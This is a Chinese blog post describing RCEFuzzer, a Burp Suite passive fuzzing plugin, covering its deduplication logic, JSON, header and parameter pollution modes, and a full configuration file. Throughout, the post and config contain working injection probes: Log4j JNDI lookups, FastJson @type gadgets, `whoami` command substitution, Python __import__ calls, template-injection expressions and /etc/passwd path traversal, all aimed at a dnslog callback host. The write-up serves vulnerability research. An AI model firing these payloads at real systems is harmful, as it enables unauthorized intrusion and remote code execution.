写在前面
1. 这是大概三年前的版本,基本已经停止维护,除非严重 Bug 外不考虑更新。
2. 这个版本是以 Burp 插件的形式存在,新版本是独立的系统,仅在 JJ Team 开放使用。
3. 仅开放 Release 版本作为交流学习使用, jar 没做混淆,实际上和放代码差别不大,作为交流学习使用我认为足够了,拿着源代码做细微调整意义不大,研究学习建议重构。
4. 欢迎交流学习~
01
工具地址
https://github.com/TheKingOfDuck/RCEFuzzer02
基础介绍
这是一个以 fuzz 为中心思想的被动扫描工具,多数扫描器的工作逻辑是以已知漏洞去冲目标,然后根据条件判断是否存在这个已知的漏洞;RCEFuzzer 的工作逻辑是以通用 payload 去污染目标的参数,然后根据条件判断是否存在未知漏洞。
举个例子,假设被动收集到的流量是:
POST /sys/customer/list HTTP/1.1Host: www.baidu.comContent-Length: 23Content-Type: application/json;charset=UTF-8{"key1":"value1","key2":"eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9","id":1,"isLogin":false,"key3":{"innerkey2":"{\"k3\":\"v3\"}"}}
如果配置了三条通用的 payload :
${jndi:ldap://dnslog/log4j}`whoami`.dnslog{"@type":"java.net.Inet4Address","val":"dnslog"}
那么 RCEFuzzer 的参数污染模块将对目标发起以下请求:
污染 key1 的值然后分别发包
污染 key2 的值然后分别发包
尝试自动解码 key2 ,并污染子 JSON 的 innerkey1 的值然后分别发包
污染 key3 的值然后分别发包。
污染 key3 的子 JSON 的 innerkey2 的值,然后分别发包。
尝试解析 innerkey2 ,并污染子JSON的 k3 的值然后分别发包
理论上总的请求量是 3*6=18 次。这仅是参数污染模块,如果带上其他模块,那请求量可能是 50 。如果 payload 写得多点,原流量大一点,那么可能是 5000 次。
流量过大注定他没法在常规日站的场景使用,给目标写入一堆脏数据,那就得不偿失了。
对自己日常自己跑起来要挖洞的系统,测试类环境的系统就无所谓。
03
资产去重
上面提到流量会非常大,选出需要污染的流量就尤为重要,降低扫描基数,扫描流量也将大幅下降,那么在这个方向上我做了哪些尝试呢:重点参考
https://blog.thekingofduck.com/post/url-normalize-in-passive-scan/除最基本的静态资源去重外,这里面还提到了关于 urlpath 、 query 等的处理的思路,但是不够完全,细心一点的会发现上文中提到的流量:
{"key1":"value1","key2":"eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9","id":1,"isLogin":false,"key3":{"innerkey2":"{\"k3\":\"v3\"}"}}这里面的 id 和 isLogin 是没有污染的,因为大部分后端语言都会定义好参数类型,对于整数型、布尔型的参数没有太大污染的必要,徒增报错罢了,除此之外流量中常见 uuid 、hash 等常见格式的值也会跳过污染,进一步缩减流量。
这里需要单独再提一下,实践中有很多确认是重复的,比如:
/order/S09834FVD/order/S07C34FDCCVX
显然两条流量对应了同一后端,是重复的,没必要都扫,但他没有像 uuid 或 md5 一样的固定特征,正则没法解决,看到一些同行的解决方案是上大模型去识别,颇有种工作饱和了没事干的感觉,本质上是区分文本是否为随机的,即将文本分为是否随机两种类型,业界有非常多成熟的文本分类模型训练教程,现成的模型,不用 GPU 就可以快速解决问题。
04
扫描模块
开放的版本中功能覆盖的有限,仅简单介绍一些思路。核心逻辑是递归追加/替换污染,对嵌套的 from-data 、json 、xml 、soap 等进行自动解码、污染、再编码。
JSON 污染
对 JSON 污染我个人理解分为以下两类:
键值污染:对于字符串类型的键值进行增加或替换的污染,除了污染成正常的资产 payload 之外,还可污染成 python 的结构体。
替换污染:对整个 JSON 进行替换,换成指定的 payload ,这里主要针对 FastJson 这样的漏洞。
具体一点的例子:
{"innerkey1":"innervalue1"}可以污染成:
{"innerkey1":__import__('socket').gethostbyaddr('dnslog')}{"innerkey1":"${jndi:ldap://dnslog/jsonkey}"}{"innerkey1":"innervalue1","@type":"java.net.Inet4Address","val":"dnslog"}{"innerkey1":{"@type":"java.net.Inet4Address","val":"dnslog"}}{"@type":"java.net.Inet4Address","val":"dnslog"}
几种漏洞类型都挺常见的。
header 污染
和JSON污染一样:
键值污染:对 header 键值进行增加或替换的污染。
替换污染:对所有 header 的键值污染成指定 payload 。
举个例子:
GET / HTTP/1.1Host: www.baidu.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Connection: closeCache-Control: max-age=0
可以污染成
GET / HTTP/1.1Host: www.baidu.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: ${jndi:ldap://dnslog/jsonkey}Connection: closeCache-Control: max-age=0X-Forwarded-For: `whoami`.dnslogX-Api-Version: ${jndi:dns://dnslog/456}
像 Host 、Connection 、Content-Type 这类 header 应该跳过污染,避免对请求本身造成影响,一次性替换全部 header 的键值这种纯粹是为了 log4j 这种 payload 打过去省事,暴力出奇迹。
参数污染
JSON 场景下一般就嵌套下转义后或编码后的 JSON ,但 form-data 表单中有非常多出现嵌套其他类型数据的情况,比如参数中嵌套 JSON ,嵌套 XML ,从某些 OA 中能够看出研发为了兼容做的不少 🐂 事。
同样分为两种模式:
替换污染:常规的命令注入、SQL 注入等等
追加污染:后端带判断类的,如校验传入值包含指定字符串时,追加模式将会非常管用。
还是举个例子:
https://www.baidu.com/admin/load?host=127.0.0.1&config=eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9可以污染成:
https://www.baidu.com/admin/load?host=dnslog&config=eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9https://www.baidu.com/admin/load?host=127.0.0.1@dnslog&config=eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9https://www.baidu.com/admin/load?host=127.0.0.1&config=eyJpbm5lcmtleTEiOiJgd2hvYW1pYC5kbnNsb2cifQ==...
为什么要做追加模式在第二个 case 中就可以看出。
SSRF
代码抄自:
https://github.com/ethicalhackingplayground/ssrf-king作者基本覆盖了常见代码产生的 SSRF 和配置错误导致的 SSRF ,非常受用。这里只是封装了嵌套解析,其他改动不大。
其他模块
还有很多了其他模块,如响应匹配、文件上传污染、SOAP 请求污染等,但并未在该版本中实现,不再一一介绍。
05
使用技巧
需要有配套的dnslog:
https://admin.xxxx.com/logs?token=xxxxxx&type=dns&q=KEYhttps://admin.xxxx.com/logs?token=xxxxxx&type=http&q=KEY
KEY 是占位符,不能改动 其他无所谓。
配置文件如下:
##### 配置说明:# 1.tweb的配置是必须要改的, 不改显示不了漏洞# 2.白名单的优先级是高于黑名单的# 3.所有配置都是可以动态改的, 不用重新加载插件# 使用说明:# https://www.wolai.com/gS5UWgMmHG4ynJQgzL3AYk###config:version: | # 插件版本0.5twebdomain: | # tweb 子域名配置xxx.xx.comtwebapi: | # tweb api配置 其中KEY为展位符,在新旧版本的tweb均可在Profile页面找到https://admin.xxxx.com/logs?token=xxxxxx&type=dns&q=KEYtimeout: | # 扫描过程中的超时配置 非tweb请求超时设置 单位毫秒 60000为60秒60000hostBlacklistReg: | # 禁止扫描的域名列表(.+?)(gov\.cn|edu\.cn|tweb|google|gstatic)(.+?)extBlacklist: | # 禁止扫描的后缀列表,这不是正则,本来想从passive-scan-client中抄代码的,结果发现他有bug....js|.css|.jpeg|.gif|.jpg|.png|.pdf|.rar|.zip|.docx|.doc|.icojsonPollution:status: #on为开启 off为关闭onallin: | #替换整个json数据包{"@type":"java.net.Inet4Address","val":"dnslog"}value: | #仅污染json的键值 为了python eval那种情况考虑 不加双引号包裹的话污染结果类似{"test":__import__('os')} {"test":"{\"dtaa\":__import__('os')}"}"${jndi:ldap://dnslog/jsonkey}"__import__('socket').gethostbyaddr('dnslog')paramPollution:status: #on为开启 off为关闭onexprs: | #为了兼容有回显的表达式注入/代码执行漏洞{{9527*2333}}|22226491${T(java.lang.System).getenv()}|JAVA_HOME${T+++++++(java.lang.System).getenv()}|JAVA_HOME{php}var_dump(md5(9527));{/php}|52569c045dc348f12dfc4c85000ad832{if+var_dump(md5(9527))}{/if}|52569c045dc348f12dfc4c85000ad832../../../../../../../../../../../../../../../etc/passwd|rootvalue: |dnslog${jndi:ldap://paramPollution.dnslog/log4j}`whoami`.dnsloghttp://dnslog/ping+-nc+1+dnslogheaderPollution:status: #on为开启 off为关闭onallin: | #一次性污染除了url和host外的所有请求头${jndi:dns://dnslog/456}${jndi:ldap://dnslog/789}headers: | #添加的请求头如果原数据包有则追加原值污染 无则添加后再发包 竖线|为key和value的分隔符号。X-Forwarded-For|${jndi:dns://dnslog/456}X-Api-Version|${jndi:dns://dnslog/456}ssrfPollution:status: #on为开启 off为关闭onresponseMatch:status: #on为开启 off为关闭offexpr: | #添加的请求头如果原数据包有则覆盖原值污染 无则添加后再发包thinkphp:error
参数污染中 exprs 部分的配置以 | 作为切割,区分请求和响应,用于回显漏洞的检测。tweb 处配置 dnslog 的子域名和 api 查询的 url 即可。
06
写在最后
RCEFuzzer 在实践中直接或间接的为我贡献了几十个的 RCE ,不少系统通过点点就可轻易收割漏洞点,进而撕开口子,拿到代码,进一步审计得到更有价值的洞,是生产漏洞的重要一环,也希望能为各位贡献新的RCE!
最后的最后,特别要提的是 RCEFuzzer 中不少思路都来源于 c26root (即大 6 老师)的指点,大 6 老师才是真正的神,大 6 老师🐮🍺!